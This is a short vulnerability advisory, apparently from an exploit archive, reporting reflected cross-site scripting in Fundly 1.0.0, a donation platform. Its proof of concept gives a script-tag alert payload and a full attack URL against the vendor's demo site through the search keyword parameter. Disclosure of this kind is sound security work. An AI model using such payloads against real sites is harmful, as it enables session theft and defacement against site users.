Fundly version 1.0.0 suffers from a cross site scripting vulnerability.
5869a18724d84d543e50301a2dc2104c============================================================================================================================
| # Title : Fundly 1.0.0 XSS Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 1.0.0 |
| # Vendor : https://codecanyon.net/item/fundly-a-donation-platform/21225201?s_rank=4 |
| # Dork : n/a |
============================================================================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] in Search box use payload : <script>alert(/indoushka/);</script>
http://fundly.techvill.net/search?keyword=1%3C/title%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================